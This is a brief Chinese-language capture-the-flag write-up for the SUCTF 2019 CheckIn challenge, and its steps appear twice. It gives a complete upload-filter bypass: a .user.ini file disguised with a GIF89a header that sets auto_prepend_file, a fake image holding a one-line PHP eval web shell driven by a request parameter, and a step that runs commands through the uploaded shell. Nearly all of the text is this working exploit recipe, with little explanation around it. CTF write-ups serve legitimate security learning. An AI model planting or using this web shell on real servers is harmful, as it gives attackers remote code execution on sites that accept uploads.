先上传.user.ini
GIF89a
auto_prepend_file=shell.png
在上传shell.png
GIF89a
<script language="php">@eval($_REQUEST[a]);</script>
访问/uploads/cc551ab005b2e60fbdc88de809b2c4b1/index.php
执行命令读取flag
查看源代码
先上传.user.ini
GIF89a
auto_prepend_file=shell.png
在上传shell.png
GIF89a
<script language="php">@eval($_REQUEST[a]);</script>
访问/uploads/cc551ab005b2e60fbdc88de809b2c4b1/index.php
执行命令读取flag
查看源代码
[SUCTF 2019]CheckIn
https://www.bnessy.com/archives/suctf2019checkin